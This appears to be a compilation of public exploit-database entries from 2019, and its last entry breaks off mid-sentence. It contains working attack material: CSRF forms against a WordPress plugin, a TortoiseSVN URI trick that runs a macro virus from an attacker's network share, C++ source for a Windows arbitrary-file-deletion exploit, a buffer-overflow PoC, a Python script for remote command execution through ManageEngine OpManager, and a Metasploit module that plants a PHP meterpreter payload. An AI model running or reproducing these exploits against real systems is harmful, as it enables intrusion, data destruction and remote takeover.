ISHACK AI BOT

# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 # Google Dork: inurl:"/wp-content/plugins/download-manager # Date: 24 may, 2019 # Exploit Author: Princy Edward # Exploit Author Blog : https://prinyedward.blogspot.com/ # Vendor Homepage: https://www.wpdownloadmanager.com/ # Software Link: https://wordpress.org/plugins/download-manager/ # Tested on: Apache/2.2.24 (CentOS) POC #1 There is no CSRF nonce check performed in "POST /wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. #Code <form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting"> <input type="hidden" name="__wpdm_email_template" value="default.html"> <input type="hidden" name="__wpdm_email_setting[logo]" value="https://hacker.jpg"> <input type="hidden" name="__wpdm_email_setting[banner]" value="https://hacker.jpg"> <input type="hidden" name="__wpdm_email_setting[footer_text]" value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]" value="https://malicious-url.com"> <input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com"> <input type="hidden" name="__wpdm_email_setting[youtube]" value="https://malicious-url.com"> <input type="submit"> </form> #2 There is no CSRF nonce check performed in "POST /wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat e&id=default" request. #Code <form method="POST" action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email& task=EditEmailTemplate&id=default"> <input type="hidden" name="id" value="default"> <input type="hidden" name="email_template[subject]" value="forget password"> <input type="hidden" name="email_template[message]" value="aaa"> <input type="hidden" name="email_template[from_name]" value="hacker"> <input type="hidden" name="email_template[from_email]" value="[email protected]"> <input type="submit"> </form>

Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2188 Product: https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/ Ticket: https://groups.google.com/forum/#!forum/tortoisesvn http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422 CVE-ID: ======= CVE-2019-14422 Release Date: ============= 2019-08-13 Vulnerability Laboratory ID (VL-ID): ==================================== 2188 Common Vulnerability Scoring System: ==================================== 8.8 Vulnerability Class: ==================== Code Execution Current Estimated Price: ======================== 4.000€ - 5.000€ Product & Service Introduction: =============================== TortoiseSVN is a really easy to use Revision control / version control / source control software for Windows. It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and easy user interface for Subversion. It is developed under the GPL. Which means it is completely free for anyone to use, including in a commercial environment, without any restriction. The source code is also freely available, so you can even develop your own version if you wish to. Since it's not an integration for a specific IDE like Visual Studio, Eclipse or others, you can use it with whatever development tools you like, and with any type of file. (Copy of the about page: https://tortoisesvn.net/about.html ) Abstract Advisory Information: ============================== A vulnerability laboratory researcher (vxrl team) discovered a remote code execution vulnerability in the TortoiseSVN v1.12.1 software. Vulnerability Disclosure Timeline: ================================== 2019-08-13: Public Disclosure (Vulnerability Laboratory) Affected Product(s): ==================== TortoiseSVN Product: TortoiseSVN - Software 1.12.1 Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A remote code execution vulnerability has been uncovered in the official TortoiseSVN v1.12.1 software. The vulnerability typ allows remote attackers to execute arbitrary codes to compromise a target computer system. The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff operation on Excel workbooks, which could be used to open remote workbooks without protection from macro security settings to execute arbitrary code. The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a customised diff on [file1] and [file2] based on the file extension. For xls files, it will execute the script `diff-xls.js` using wscript, which will open the two files for analysis without any macro security warning. An attacker can exploit this by putting a macro virus in a network drive, and force the victim to open the workbooks and execute the macro inside. Since the macro is triggered through wscript, to make the attack less visible, one could kill the wscript process and quit the excel program after the code was executed. Proof of Concept (PoC): ======================= The vulnerability could be triggered by visiting a specially crafted URL via web browser. To reproduce the vulnerability, one could simply create a .url file or open the URL with a browsers, but a notification prompt may be shown for the latter case. <a href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout the Repo with TortoiseSVN</a> where VBoxSvrv is the remote network drive controlled by the attacker, v.xlsm is the macro virus and w.xlsx is just an empty excel workbook. Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar Password: 23vxrl23 PoC: Video https://www.youtube.com/watch?v=spvRSC377vI Security Risk: ============== The security risk of the remote code execution vulnerability in the software component is estimated as high. Credits & Authors: ================== PingFanZettaKe [VXRL Team] - https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

/* # Author : Abdelhamid Naceri # Discovered On : 13/08/2019 # Description : An Elevation Of Privileges Exist when the microsoft AppXSvc Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion from a low integrity user . # Still Unpatched On 13/08/2019 Here Is A Demo Video https://youtu.be/jqYwMcNvTtM */ #include"windows.h" #include"iostream" #include"conio.h" #include"stdio.h" #include"tlhelp32.h" #include"cstdio" #include"wchar.h" #include"process.h" #include"wchar.h" #include"string" #include"tchar.h" #pragma warning(disable : 4996) #pragma comment(lib, "advapi32.lib") #ifndef UNICODE typedef std::string String; #else typedef std::wstring String; #endif using namespace std; bool FileExists(const wchar_t* file) { if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND) { return false; } else { return true; } } void remove_dir(const wchar_t* folder) { std::wstring search_path = std::wstring(folder) + _T("/*.*"); std::wstring s_p = std::wstring(folder) + _T("/"); WIN32_FIND_DATA fd; HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd); if (hFind != INVALID_HANDLE_VALUE) { do { if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0) { remove_dir((wchar_t*)(s_p + fd.cFileName).c_str()); } } else { DeleteFile((s_p + fd.cFileName).c_str()); } } while (::FindNextFile(hFind, &fd)); ::FindClose(hFind); _wrmdir(folder); } } void killProcessByName(const wchar_t* filename) { HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL); PROCESSENTRY32 pEntry; pEntry.dwSize = sizeof(pEntry); BOOL hRes = Process32First(hSnapShot, &pEntry); while (hRes) { if (wcscmp(pEntry.szExeFile, filename) == 0) { HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0, (DWORD)pEntry.th32ProcessID); if (hProcess != NULL) { TerminateProcess(hProcess, 9); CloseHandle(hProcess); } } hRes = Process32Next(hSnapShot, &pEntry); } CloseHandle(hSnapShot); } bool IsProcessRunning(const wchar_t* processName) { bool exists = false; PROCESSENTRY32 entry; entry.dwSize = sizeof(PROCESSENTRY32); HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); if (Process32First(snapshot, &entry)) while (Process32Next(snapshot, &entry)) if (!_wcsicmp(entry.szExeFile, processName)) exists = true; CloseHandle(snapshot); return exists; } bool dirExists(const std::string& dirName_in) { DWORD ftyp = GetFileAttributesA(dirName_in.c_str()); if (ftyp == INVALID_FILE_ATTRIBUTES) return false; if (ftyp & FILE_ATTRIBUTE_DIRECTORY) return true; return false; } void KillEdge() { killProcessByName(L"MicrosoftEdge.exe"); } void StartEdge() { try { system("start microsoft-edge:"); } catch (...){} } void exploit(const char* path) { //Inintializing the variable before begining int attempt = 0; string command; wchar_t* userprofile = _wgetenv(L"USERPROFILE"); const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe"); //I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution //I deleted him first const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState"); wstring froamingpath(userprofile); froamingpath += wstring(roamingpath); wstring fullpath(userprofile); fullpath += std::wstring(relpath); wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str(); wstring fpath(szBuffsrc); string strfpath(fpath.begin(), fpath.end()); //Check If MS-Edge Need To Write DACL Or Not if (dirExists(strfpath) != true) { printf("[!] Wait MS-Edge Need To Write The DACL"); StartEdge(); for (;;) { Sleep(1000); if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; } } StartEdge(); Sleep(7000); KillEdge(); printf("\r "); } //End Of Check printf("\r# Author : Abdelhamid Naceri\n"); printf("# Tested On Windows 10 32&64bit\n"); printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); printf("[+] Checking If Path Exist ..."); Sleep(2000); if (dirExists(path) != true) { printf("Your Path Is Invalid"); ExitProcess(EXIT_FAILURE); } else { printf("Exist !\n"); KillEdge(); printf("[+] Starting MS-Edge ...\n"); StartEdge(); Sleep(4000); printf("[+] Killing MS-Edge ...\n"); KillEdge(); Sleep(3000); printf("[+] Wipping MS-Edge Directory ...\n"); killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files remove_dir(roamingpath); remove_dir(szBuffsrc); Sleep(2000); remove_dir(szBuffsrc); printf("[+] Checking If Directory Exist Anymore ..."); if (dirExists(strfpath) == true) { if (dirExists(strfpath) == true) { printf("Something Went Wrong"); printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue"); command = "explorer "; command.append(strfpath); system(command.c_str()); _getch(); goto Continue; } } else { Continue: printf(" Done\n"); Sleep(3000); printf("[+] Attempting to Create Junction To Target ...\n"); command = "mklink /J "; command.append("\""); command.append(strfpath); command.append("\""); command.append(" "); command.append("\""); command.append(path); command.append("\""); system(command.c_str()); printf("Done\n"); Sleep(3000); printf("[+] Firing Up MS-Edge Again ...\n"); StartEdge(); do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe")); Sleep(3000); StartEdge(); command = "explorer "; command.append(path); printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n"); system(command.c_str()); printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n"); _getch(); printf("Cleaning ..."); _wremove(szBuffsrc); _wrmdir(szBuffsrc); ExitProcess(EXIT_SUCCESS); } } } int main(int argc, char* argv[]) { if (argc == 2) {exploit(argv[1]);} else { printf("# Author : Abdelhamid Naceri\n"); printf("# Tested On Windows 10 1903 32&64bit\n"); printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); printf("[!] Usage : poc.exe TargetPath"); } return EXIT_SUCCESS; }

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <[email protected]> Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on: Debian Buster An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return address from the openIn function by providing a long input filename. This carries similar risk to CVE-2004-1257. Setup: $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz $ tar -xzf abc2mtex1.6.1.tar.gz $ make $ gcc --version gcc (Debian 8.3.0-6) 8.3.0 Copyright (C) 2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. PoC: $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA GDB: We're going to place a breakpoint before and after abc.c:241 to show the overflow. $ gdb -q ./abc2mtex Reading symbols from ./abc2mtex...done. (gdb) break abc.c:241 Breakpoint 1 at 0x4139: file abc.c, line 241. (gdb) break abc.c:242 Breakpoint 2 at 0x414c: file abc.c, line 242. (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 241 (void) strcpy(savename,filename); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 #1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273 (gdb) c Continuing. Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 242 (void) strcat(filename,".abc"); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 #1 0x0000414243444546 in ?? () #2 0x00007fffffffe4f8 in ?? () #3 0x0000000200000000 in ?? () #4 0x0000000000000000 in ?? () (gdb) c Continuing. file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist Program received signal SIGSEGV, Segmentation fault. 0x0000414243444546 in ?? () (gdb) quit

#!/usr/bin/env python3 # Exploit Title: ManageEngine opManager Authenticated Code Execution # Google Dork: N/A # Date: 08/13/2019 # Exploit Author: @kindredsec # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/network-monitoring/download.html # Version: 12.3.150 # Tested on: Windows Server 2016 # CVE: N/A import requests import re import random import sys import json import string import argparse C_WHITE = '\033[1;37m' C_BLUE = '\033[1;34m' C_GREEN = '\033[1;32m' C_YELLOW = '\033[1;33m' C_RED = '\033[1;31m' C_RESET = '\033[0m' LOGIN_FAIL_MSG = "Invalid username and/or password." def buildRandomString(length=10): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def getSessionData(target, user, password): session = requests.Session() session.get(target) # Login Sequence randSid = random.uniform(-1,1) getParams = { "requestType" : "AJAX" , "sid" : str(randSid) } postData = { "eraseAutoLoginCookie" : "true" } session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams ) postData = { "loginFromCookieData" : "false", "ntlmv2" : "false", "j_username" : user, "j_password" : password } initialAuth = session.post( url = target + "/j_security_check", data = postData ) if LOGIN_FAIL_MSG in initialAuth.text: print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.") sys.exit(1) elif initialAuth.status_code != 200: print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.") sys.exit(1) apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text) apiKey = apiKeyReg.group(0).split('"')[1] return { "session" : session , "apiKey" : apiKey } def getDeviceList(target, session, apiKey): deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } ) devices = {} devicesJsonParsed = json.loads(deviceList.text) for row in devicesJsonParsed["rows"]: devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ] return devices def buildTaskWindows(target, session, apiKey, device, command): # Build Task taskName = buildRandomString() workFlowName = buildRandomString(15) jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" jsonData += '"' + taskName + '"' jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" jsonData += '"' + command + '"' jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" jsonData += '"' + workFlowName + '"' jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" jsonData += '"' + device + '"' jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) if "has been created successfully" in makeWorkFlow.text: print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") else: print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .") sys.exit(1) return workFlowName def buildTaskLinux(target, session, apiKey, device, command): taskName = buildRandomString() workFlowName = buildRandomString(15) jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" jsonData += '"' + taskName + '"' jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" jsonData += '"' + command + '"' jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" jsonData += '"' + workFlowName + '"' jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" jsonData += '"' + device + '"' jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) if "has been created successfully" in makeWorkFlow.text: print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") else: print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .") sys.exit(1) return workFlowName # Get the ID of the newly created workflow def getWorkflowID(target, session, apiKey, workflowName): getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey }) rbID = -100 workflowJsonParsed = json.loads(getID.text) for wf in workflowJsonParsed: if wf['name'] == workflowName: rbID = wf['rbID'] if rbID == -100: print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...") sys.exit(1) return rbID def getDeviceID(target, session, apiKey, rbID, device): getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID }) wfDevicesJsonParsed = json.loads(getDevices.text) wfDevices = wfDevicesJsonParsed["defaultDevices"] deviceID = list(wfDevices.keys())[0] return deviceID def runWorkflow(target, session, apiKey, rbID, device): targetDeviceID = getDeviceID(target, session, apiKey, rbID, device) print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .") workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 } ) if re.match(r"^\[.*\]$", workflowExec.text.strip()): print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!") else: print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.") sys.exit(1) deleteWorkflow(target, session, apiKey, rbID) print(f"{C_GREEN}[+]{C_RESET} Exploit complete!") def deleteWorkflow(target, session, apiKey, rbID): print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .") delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID }) def main(): parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.") parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)") parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.") parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.") parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.") args = parser.parse_args() insufficient_args = False if not args.u: print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.") insufficient_args = True if not args.t: print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.") insufficient_args = True if not args.p: print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.") insufficient_args = True if not args.c: print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.") insufficient_args = True if insufficient_args: sys.exit(1) sessionDat = getSessionData(args.t, args.u, args.p) session = sessionDat["session"] apiKey = sessionDat["apiKey"] devices = getDeviceList(args.t, session, apiKey) # if there's only one device in the OpManager instance, default to running commands on that device; # no need to ask the user. if len(devices.keys()) == 1: device = list(devices.keys())[0] else: print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:") print("") counter = 1 for key in devices.keys(): print(f" {counter}: {key} ({devices[key][0]}) ({devices[key][1]})") print("") while True: try: prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: " devSelect = int(input(prompt)) except KeyboardInterrupt: sys.exit(1) except ValueError: print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") sys.exit(1) if devSelect < 1 or devSelect > len(list(devices.keys())): print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") sys.exit(1) else: device = list(devices.keys())[counter - 1] break # don't hate, it works doesn't it? if "indows" in devices[device][1]: workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c) else: workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c) workflowID = getWorkflowID(args.t, session, apiKey, workflowName) runWorkflow(args.t, session, apiKey, workflowID, device) main()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Tesla Agent Remote Code Execution", 'Description' => %q{ This module exploits the command injection vulnerability of tesla agent botnet panel. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <[email protected]>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP ], 'Targets' => [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "July 10 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']), ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'), ) #print_status(res.body) if res && res.body.include?('SQLSTATE') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit check name = '.'+Rex::Text.rand_text_alpha(4)+'.php' res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'), 'encode_params' => true, 'vars_get' => { 'table' => 'passwords', 'primary' => 'password_id', 'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}', 'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"") } ) if res && res.code == 200 && res.body.include?('recordsTotal') print_good("Payload uploaded as #{name}") else print_error('Payload upload failed :(') Msf::Exploit::Failed end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5 ) if res && res.code == 200 print_good("Payload successfully triggered !") else print_error('Payload trigger failed :(') Msf::Exploit::Failed end end end

There is an info leak when decoding the SGBigUTF8String class using [SGBigUTF8String initWithCoder:]. This class initializes the string using [SGBigUTF8String initWithUTF8DataNullTerminated:] even though there is no guarantee the bytes provided to the decoder are null terminated. It should use [SGBigUTF8String initWithUTF8Data:] instead. While this class is included in iMessage, it is more likely that this bug could be useful in local attacks. To reproduce this issue: 1) Compile decodeleak.m clang -o decodeleak -g decodeleak.m -fobjc-arc -framework CoreSuggestionsInternals -F/System/Library/PrivateFrameworks 2) Run: ./decodeleaks obj leaked memory will be printed to the screen. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47257.zip

The msctf subsystem is part of the Text Services Framework, The TSF manages things like input methods, keyboard layouts, text processing and so on. There are two main components, the ctfmon server and the msctf client. The ctfmon service creates an ALPC port in a well known location, to which clients connect and exchange messages. When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client. The CTF subsystem is vast and complex. It was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system. There are multiple critical design flaws in this system, I've written a detailed technical analysis and an interactive utility to probe the CTF subsystem. $ ./ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> help Type `help <command>` for help with a specific command. Any line beginning with # is considered a comment. help - List available commands. exit - Exit the shell. connect - Connect to CTF ALPC Port. info - Query server informaiton. scan - Enumerate connected clients. callstub - Ask a client to invoke a function. createstub - Ask a client to instantiate CLSID. hijack - Attempt to hijack an ALPC server path. sendinput - Send keystrokes to thread. setarg - Marshal a parameter. getarg - Unmarshal a parameter. wait - Wait for a process and set it as the default thread. thread - Set the default thread. sleep - Sleep for specified milliseconds. forget - Forget all known stubs. stack - Print the last leaked stack ptr. marshal - Send command with marshalled parameters. proxy - Send command with proxy parameters. call - Send command without appended data. window - Create and register a message window. patch - Patch a marshalled parameter. module - Print the base address of a module. module64 - Print the base address of a 64bit module. editarg - Change the type of a marshalled parameter. symbol - Lookup a symbol offset from ImageBase. set - Change or dump various ctftool parameters. show - Show the value of special variables you can use. lock - Lock the workstation, switch to Winlogon desktop. repeat - Repeat a command multiple times. run - Run a command. script - Source a script file. print - Print a string. consent - Invoke the UAC consent dialog. reg - Lookup a DWORD in the registry. Most commands require a connection, see "help connect". ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000248 ctf> info The server responded. 000000: 20 00 38 00 02 10 00 00 ec 04 00 00 a4 1a 00 00 .8............. 000010: dc b6 00 00 35 1b 2e 00 38 00 00 00 20 2a 00 00 ....5...8... *.. 000020: 00 00 00 00 00 00 00 00 ec 04 00 00 00 00 00 00 ................ 000030: 00 00 00 00 00 00 00 00 ........ Monitor PID: 1260 ctf> Please see the attached document for a detailed analysis, but here are my major concerns with the service: 1. The ctfmon ALPC port is accessible across sessions, allowing users to compromise other users of the system. 2. UIPI can be bypassed, sending input events to higher integrity windows. This is an AppContainer or IL sandbox escape. 3. The msctf client disables UIPI for Marshal event windows. As far as I can tell, this is unnecessary, only ctfmon should be sending these messages, which is already high integrity. 4. The MSG_CALLSTUB command does not validate the command index, allowing arbitrary code execution. 4a. Frankly, even if you call a legitimate stub, you’re often trusted to Marshal pointers across the interface. Many of the legitimate functions expect pointers with no validation (For example, CInputProcessorProfiles::Register, which is called via CStubITfInputProcessorProfileMgr::stub_ActivateProfile, FunctionIndex 3 for TfInputProcessorProfileMgr) 5. There is no mutual authentication of Servers or Clients, therefore: 5a. You can hijack the alpc server path for other sessions and wait for clients to connect to you, then send them input. 5b. You can lie about your ThreadId, ProcessId and HWND, effectively redirecting messages from other clients. I'm planning to write a 